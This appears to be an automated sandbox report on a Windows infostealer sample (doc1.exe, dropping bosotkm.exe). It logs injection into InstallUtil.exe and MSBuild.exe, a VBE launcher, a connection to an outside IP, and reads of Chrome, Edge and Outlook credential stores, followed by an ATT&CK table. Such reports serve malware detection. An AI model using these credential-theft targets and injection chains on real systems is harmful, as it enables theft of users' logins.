                  Source: InstallUtil.exe, 0000001A.00000002.3446787487.0000000001147000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlles C/
                  Source: bosotkm.exe, 00000012.00000002.2593909614.00000000032E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                  Source: wscript.exe, 00000005.00000003.2384565726.00000198522E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: InstallUtil.exe, 00000015.00000002.3450204608.0000000000EAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
                  Source: InstallUtil.exe, 00000004.00000002.3445132383.0000000000ABE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\doc1.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPort
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_05777588 LdrInitializeThunk,21_2_05777588
                  Source: C:\Users\user\Desktop\doc1.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 144.91.79.54 80Jump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 9D0000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1210000 value starts with: 4D5A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 700000 value starts with: 4D5A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 9D0000 value starts with: 4D5A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F80000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\doc1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 422000Jump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 424000Jump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 702008Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 9D0000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 9D2000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 9E4000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 9E6000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: A85008Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 422000
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 424000
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: B49008
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 422000
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 424000
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: D93008
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1210000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1212000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1224000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1226000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1054008
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 700000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 702000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 714000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 716000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47A008
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 9D0000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 9D2000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 9E4000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 9E6000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BAD008
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F80000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F82000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F94000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F96000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D53008
                  Source: C:\Users\user\Desktop\doc1.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" Jump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 1064Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3508" "2808" "2740" "2812" "0" "0" "2816" "0" "0" "0" "0" "0" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2188" "2800" "2756" "2804" "0" "0" "2808" "0" "0" "0" "0" "0"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6756" "2872" "2688" "2876" "0" "0" "2880" "0" "0" "0" "0" "0"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2548" "2816" "1512" "2820" "0" "0" "2824" "0" "0" "0" "0" "0"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2744" "2812" "2240" "2816" "0" "0" "2820" "0" "0" "0" "0" "0"
                  Source: C:\Users\user\Desktop\doc1.exeQueries volume information: C:\Users\user\Desktop\doc1.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeQueries volume information: C:\Users\user\AppData\Roaming\bosotkm.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeQueries volume information: C:\Users\user\AppData\Roaming\bosotkm.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exe, Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exe, Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                  Source: C:\Windows\System32\svchost.exe, Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\doc1.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match, File source: 12.2.MSBuild.exe.9d0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0000000C.00000002.2456553798.00000000009D2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: Process Memory Space: MSBuild.exe PID: 4896, type: MEMORYSTR
                  Source: Yara match, File source: 21.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 1.2.doc1.exe.3c2d068.4.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 11.2.bosotkm.exe.417bdd0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 1.2.doc1.exe.3c2d068.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 11.2.bosotkm.exe.417bdd0.1.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: Process Memory Space: doc1.exe PID: 6400, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 5392, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: bosotkm.exe PID: 1864, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: bosotkm.exe PID: 1292, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 948, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 1596, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                  Remote Access Functionality

                  Source: Yara match, File source: 21.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 1.2.doc1.exe.3c2d068.4.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 11.2.bosotkm.exe.417bdd0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 1.2.doc1.exe.3c2d068.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 11.2.bosotkm.exe.417bdd0.1.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: Process Memory Space: doc1.exe PID: 6400, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 5392, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: bosotkm.exe PID: 1864, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: bosotkm.exe PID: 1292, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 948, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 1596, type: MEMORYSTR
                  | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                  | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
                  | Gather Victim Identity Information | 211 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 211 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                  | Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 311 Process Injection | 3 Obfuscated Files or Information | LSASS Memory | 24 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
                  | Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 12 Software Packing | Security Account Manager | 221 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
